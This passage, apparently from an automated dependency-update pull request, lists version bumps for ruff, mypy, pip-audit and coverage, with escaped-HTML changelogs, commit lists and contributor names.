href=\"https://redirect.github.com/astral-sh/ruff/pull/25642\"\u003e#25642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SuryanshSS1011\"\u003e\u003ccode\u003e@​SuryanshSS1011\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/romero-deshaw\"\u003e\u003ccode\u003e@​romero-deshaw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/karlhillx\"\u003e\u003ccode\u003e@​karlhillx\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md\"\u003eruff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.17\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-11.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect diagnostic start and parent ranges and trailing comments in \u003ccode\u003eruff:ignore\u003c/code\u003e suppressions (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25673\"\u003e#25673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Add \u003ccode\u003etrio.as_safe_channel\u003c/code\u003e to safe decorators (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25775\"\u003e#25775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Also check \u003ccode\u003epytest_asyncio\u003c/code\u003e fixtures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25375\"\u003e#25375\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Ban \u003ccode\u003epytest\u003c/code\u003e autouse fixtures (\u003ccode\u003eRUF076\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25477\"\u003e#25477\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Add \u003ccode\u003efrom __future__ import annotations\u003c/code\u003e automatically (\u003ccode\u003eUP007\u003c/code\u003e, \u003ccode\u003eUP045\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/23259\"\u003e#23259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix diagnostic when \u003ccode\u003eruff:enable\u003c/code\u003e or \u003ccode\u003eruff:disable\u003c/code\u003e appears where \u003ccode\u003eruff:ignore\u003c/code\u003e is expected (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25700\"\u003e#25700\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Preserve leading empty literals to avoid syntax errors (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25491\"\u003e#25491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Clarify diagnostic message for single parameters (\u003ccode\u003ePT007\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25592\"\u003e#25592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003enumpy\u003c/code\u003e] Drop autofix for \u003ccode\u003enp.in1d\u003c/code\u003e (\u003ccode\u003eNPY201\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25612\"\u003e#25612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Exempt Python version comparisons (\u003ccode\u003ePLR2004\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25743\"\u003e#25743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReserve AST \u003ccode\u003eVec\u003c/code\u003es with correct capacity for common cases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25451\"\u003e#25451\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFormatter\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve whitespace for Quarto cell option comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25641\"\u003e#25641\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow rule names in \u003ccode\u003eruff rule\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25640\"\u003e#25640\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix playground diagnostics scrollbars (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25642\"\u003e#25642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SuryanshSS1011\"\u003e\u003ccode\u003e@​SuryanshSS1011\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/romero-deshaw\"\u003e\u003ccode\u003e@​romero-deshaw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/karlhillx\"\u003e\u003ccode\u003e@​karlhillx\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/7c645a9a1be8258b9f9e005208a55a0b7e8e18f0\"\u003e\u003ccode\u003e7c645a9\u003c/code\u003e\u003c/a\u003e Bump 0.15.17 (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25872\"\u003e#25872\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/f381eb1d54997cfbfa6f63c15dd2d760f70e85e1\"\u003e\u003ccode\u003ef381eb1\u003c/code\u003e\u003c/a\u003e Prioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/b9b4546ad27d8fd12acc979e312a3ee25ef8ac4f\"\u003e\u003ccode\u003eb9b4546\u003c/code\u003e\u003c/a\u003e Minor workflow simplification (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25870\"\u003e#25870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/1e77ba02570bbe4952f7cf0e4ebb97b8b4e6e58d\"\u003e\u003ccode\u003e1e77ba0\u003c/code\u003e\u003c/a\u003e [ty] Move \u003ccode\u003ePreformattedBlockScanner\u003c/code\u003e to format-agnostic location. (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25856\"\u003e#25856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/6f2b772285aa478e8aee3f4b54dfa9ce903a0ce1\"\u003e\u003ccode\u003e6f2b772\u003c/code\u003e\u003c/a\u003e [ty] Preserve nominal type of enum.property instances (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25849\"\u003e#25849\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/be4777c8766a38d405a69948989cdfa2674adaae\"\u003e\u003ccode\u003ebe4777c\u003c/code\u003e\u003c/a\u003e [ty] Fix site-package error when multiple versions of pythons are installed i...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/53f6ff7200983a67778fcba7106019d2615846f0\"\u003e\u003ccode\u003e53f6ff7\u003c/code\u003e\u003c/a\u003e Allow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/67403254192f3541bd7e1027c8f1805cf7a9c2be\"\u003e\u003ccode\u003e6740325\u003c/code\u003e\u003c/a\u003e [ty] Restrict uncached raw signature access (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25866\"\u003e#25866\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/970b1bf4a4d83359c9e28cad5f127ebbd6769682\"\u003e\u003ccode\u003e970b1bf\u003c/code\u003e\u003c/a\u003e Auto-update snapshots when syncing typeshed (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25841\"\u003e#25841\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/0785793750fd6c74124a189259822f1a28eb5c13\"\u003e\u003ccode\u003e0785793\u003c/code\u003e\u003c/a\u003e Fix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ruff/compare/0.15.10...0.15.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mypy` from 1.20.0 to 1.20.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python/mypy/blob/master/CHANGELOG.md\"\u003emypy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003eMypy 1.20.2\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse WAL with SQLite cache and fix close (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21154\"\u003e21154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdjust SQLite journal mode (Ivan Levkivskyi, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21217\"\u003e21217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrectly aggregate narrowing information on parent expressions (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21206\"\u003e21206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix regression related to generic callables (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21208\"\u003e21208\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix regression by avoiding widening types in some contexts (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21242\"\u003e21242\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix slicing in non-strict optional mode (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21282\"\u003e21282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emypyc: Fix match statement semantics for \u0026quot;or\u0026quot; pattern (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21156\"\u003e21156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emypyc: Fix issue with module dunder attributes (Piotr Sawicki, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21275\"\u003e21275\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInitial support for Python 3.15.0a8 (Marc Mueller, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21255\"\u003e21255\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAcknowledgements\u003c/h3\u003e\n\u003cp\u003eThanks to all mypy contributors who contributed to this release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA5rocks\u003c/li\u003e\n\u003cli\u003eAaron Wieczorek\u003c/li\u003e\n\u003cli\u003eAdam Turner\u003c/li\u003e\n\u003cli\u003eAli Hamdan\u003c/li\u003e\n\u003cli\u003easce\u003c/li\u003e\n\u003cli\u003eBobTheBuidler\u003c/li\u003e\n\u003cli\u003eBrent Westbrook\u003c/li\u003e\n\u003cli\u003eBrian Schubert\u003c/li\u003e\n\u003cli\u003ebzoracler\u003c/li\u003e\n\u003cli\u003eChris Burroughs\u003c/li\u003e\n\u003cli\u003eChristoph Tyralla\u003c/li\u003e\n\u003cli\u003eColin Watson\u003c/li\u003e\n\u003cli\u003eDonghoon Nam\u003c/li\u003e\n\u003cli\u003eE. M. Bray\u003c/li\u003e\n\u003cli\u003eEmma Smith\u003c/li\u003e\n\u003cli\u003eEthan Sarp\u003c/li\u003e\n\u003cli\u003eGeorge Ogden\u003c/li\u003e\n\u003cli\u003egetzze\u003c/li\u003e\n\u003cli\u003egrayjk\u003c/li\u003e\n\u003cli\u003eGregor Riepl\u003c/li\u003e\n\u003cli\u003eIvan Levkivskyi\u003c/li\u003e\n\u003cli\u003eJames Hilliard\u003c/li\u003e\n\u003cli\u003eJames Le Cuirot\u003c/li\u003e\n\u003cli\u003eJeremy Nimmer\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eKai (Kazuya Ito)\u003c/li\u003e\n\u003cli\u003ekaushal trivedi\u003c/li\u003e\n\u003cli\u003eKevin Kannammalil\u003c/li\u003e\n\u003cli\u003eLukas Geiger\u003c/li\u003e\n\u003cli\u003eŁukasz Langa\u003c/li\u003e\n\u003cli\u003eMarc Mueller\u003c/li\u003e\n\u003cli\u003eMichael R. Crusoe\u003c/li\u003e\n\u003cli\u003emichaelm-openai\u003c/li\u003e\n\u003cli\u003eNeil Schemenauer\u003c/li\u003e\n\u003cli\u003ePiotr Sawicki\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/145a062651b5f9996b75ef32b7040bd2e885ed82\"\u003e\u003ccode\u003e145a062\u003c/code\u003e\u003c/a\u003e Bump version to 1.20.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/81cd49215c288eacb987de066f02daff2553b7c7\"\u003e\u003ccode\u003e81cd492\u003c/code\u003e\u003c/a\u003e Fix slicing with nonstrict optional (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21282\"\u003e#21282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/908d3441eecbaa2a6193165317177db834d7ca1a\"\u003e\u003ccode\u003e908d344\u003c/code\u003e\u003c/a\u003e [mypyc] Set dunder attrs when adding module to sys.modules (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21275\"\u003e#21275\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/ba28610fac9d2b33be210ca8dcfe4bc47b7af424\"\u003e\u003ccode\u003eba28610\u003c/code\u003e\u003c/a\u003e Initial support for Python 3.15.0a8 (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21255\"\u003e#21255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/7b0e09f48dbd3717ed008a273cd17e8e960c2037\"\u003e\u003ccode\u003e7b0e09f\u003c/code\u003e\u003c/a\u003e Fix match statement semantics for \u0026quot;or\u0026quot; pattern (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21156\"\u003e#21156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/92b74f226de62f7505f5ef5cb158e8ec9c58b8b7\"\u003e\u003ccode\u003e92b74f2\u003c/code\u003e\u003c/a\u003e Avoid widening types in conditional_types (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21242\"\u003e#21242\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/0dcbfaa40b0e360a16baea9cf851955375d91b54\"\u003e\u003ccode\u003e0dcbfaa\u003c/code\u003e\u003c/a\u003e Fix is_overlapping_types for generic callables (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21208\"\u003e#21208\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/210f518dede35292033ef0d387847406a0ccef8f\"\u003e\u003ccode\u003e210f518\u003c/code\u003e\u003c/a\u003e Correctly aggregate narrowing information on parent expressions (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21206\"\u003e#21206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/c34530e53a10e385d8b0f1af4baa88a596b5ceaa\"\u003e\u003ccode\u003ec34530e\u003c/code\u003e\u003c/a\u003e Only set journal mode in coordinator (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21217\"\u003e#21217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/79a3ec6d01b56a27c00e9b3320c2b1d4d73a77f9\"\u003e\u003ccode\u003e79a3ec6\u003c/code\u003e\u003c/a\u003e Use WAL with SQLite cache, fix close (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21154\"\u003e#21154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python/mypy/compare/v1.20.0...v1.20.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pip-audit` from 2.10.0 to 2.10.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip-audit/releases\"\u003epip-audit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.10.1\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a \u003ccode\u003eKeyError\u003c/code\u003e crash when an OSV vulnerability record contains an\n\u003ccode\u003eaffected\u003c/code\u003e entry that omits the optional \u003ccode\u003eranges\u003c/code\u003e field\n(\u003ca href=\"https://redirect.github.com/pypa/pip-audit/pull/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip-audit/blob/main/CHANGELOG.md\"\u003epip-audit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[2.10.1]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a \u003ccode\u003eKeyError\u003c/code\u003e crash when an OSV vulnerability record contains an\n\u003ccode\u003eaffected\u003c/code\u003e entry that omits the optional \u003ccode\u003eranges\u003c/code\u003e field\n(\u003ca href=\"https://redirect.github.com/pypa/pip-audit/pull/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/8894eb8cee033531a1fbd9f2fb160892531c14e3\"\u003e\u003ccode\u003e8894eb8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1056\"\u003e#1056\u003c/a\u003e from pypa/copilot/release-2101\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/1c625b7f4fd5790e6a05723b2ad9e670629a061d\"\u003e\u003ccode\u003e1c625b7\u003c/code\u003e\u003c/a\u003e Update version in README.md to 2.10.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/fd2094bb7b58438176d65722d77c021750a16f84\"\u003e\u003ccode\u003efd2094b\u003c/code\u003e\u003c/a\u003e Prep 2.10.1 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/58d24880a0053c9ec3ce7e3c35aef6d51d600921\"\u003e\u003ccode\u003e58d2488\u003c/code\u003e\u003c/a\u003e build(deps): bump github/codeql-action from 4.35.2 to 4.36.1 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1052\"\u003e#1052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/8df942058831baec6258f712d42a0bcb03729134\"\u003e\u003ccode\u003e8df9420\u003c/code\u003e\u003c/a\u003e build(deps): bump zizmorcore/zizmor-action from 0.5.3 to 0.5.6 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1044\"\u003e#1044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/3f618d3cde900cd89545d6a3fa4d41612f3b83df\"\u003e\u003ccode\u003e3f618d3\u003c/code\u003e\u003c/a\u003e build(deps): bump actions/checkout from 6.0.2 to 6.0.3 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1053\"\u003e#1053\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/4849132c9ec7a2b0b160ec4276408659d0cdcede\"\u003e\u003ccode\u003e4849132\u003c/code\u003e\u003c/a\u003e Restrict OIDC token to publish job (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1050\"\u003e#1050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/c1eb69a71306be7a3ffbbf2bdb59a4cb4eeaa414\"\u003e\u003ccode\u003ec1eb69a\u003c/code\u003e\u003c/a\u003e Fix KeyError when OSV affected entry omits optional \u003ccode\u003eranges\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/68de07fb9637027f61df7df2620da93f9deb11ec\"\u003e\u003ccode\u003e68de07f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1054\"\u003e#1054\u003c/a\u003e from pypa/fix/1047\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/ef31c9ea7ae844d6f9c1f85efceb9d4a2533ef5a\"\u003e\u003ccode\u003eef31c9e\u003c/code\u003e\u003c/a\u003e Formatting fixes\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/pip-audit/compare/v2.10.0...v2.10.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `coverage` from 7.13.5 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coveragepy/coveragepy/blob/main/CHANGES.rst\"\u003ecoverage's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 7.14.1 — 2026-05-26\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the HTML report used typographic niceties to make file paths more\nreadable by adding a small amount of space around slashes. Those spaces\ninterfered with searching the page for file paths of interest. Now the report\nuses CSS to accomplish the same visual tweak so that searches with slashes\nwork correctly. Closes \u003ccode\u003eissue 2170\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eAdd a 3.16 PyPI classifier \u0026lt;hugo-316_\u0026gt;\u003c/code\u003e_ since we test on the 3.16 main\nbranch.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 2170: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2170\"\u003ecoveragepy/coveragepy#2170\u003c/a\u003e\n.. _hugo-316: \u003ca href=\"https://mastodon.social/@hugovk/116588523571204490\"\u003ehttps://mastodon.social/@​hugovk/116588523571204490\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e.. _changes_7-14-0:\u003c/p\u003e\n\u003ch2\u003eVersion 7.14.0 — 2026-05-10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFeature: now when running one of the reporting commands, if there are\nparallel data files that need combining, they will be implicitly combined\nbefore creating the report. There is no option to avoid the combination; let\nus know if you have a use case that requires it.  Thanks, \u003ccode\u003eTim Hatch \u0026lt;pull 2162_\u0026gt;\u003c/code\u003e\u003cem\u003e. Closes \u003ccode\u003eissue 1781\u003c/code\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the output from \u003ccode\u003ecombine\u003c/code\u003e was too verbose, listing each file\nconsidered. Now it shows a single line with the counts of files combined,\nfiles skipped, and files with errors. The \u003ccode\u003e-q\u003c/code\u003e flag suppresses this line.\nThe old detailed lines are available with the new \u003ccode\u003e--debug=combine\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: running a Python file through a symlink now sets the sys.path correctly,\nmatching regular Python behavior. Fixes \u003ccode\u003eissue 2157\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: \u003ccode\u003eCollector.flush_data\u003c/code\u003e could fail with \u0026quot;RuntimeError: Set changed\nsize during iteration\u0026quot; when a tracer in another thread added a line to the\nper-file set that \u003ccode\u003eadd_lines\u003c/code\u003e (or \u003ccode\u003eadd_arcs\u003c/code\u003e) was iterating. The values\npassed to \u003ccode\u003eCoverageData\u003c/code\u003e are now snapshotted via \u003ccode\u003edict.copy()\u003c/code\u003e and\n\u003ccode\u003eset.copy()\u003c/code\u003e, which are atomic under the GIL. Thanks, \u003ccode\u003eAlex Vandiver \u0026lt;pull 2165_\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the soft keyword 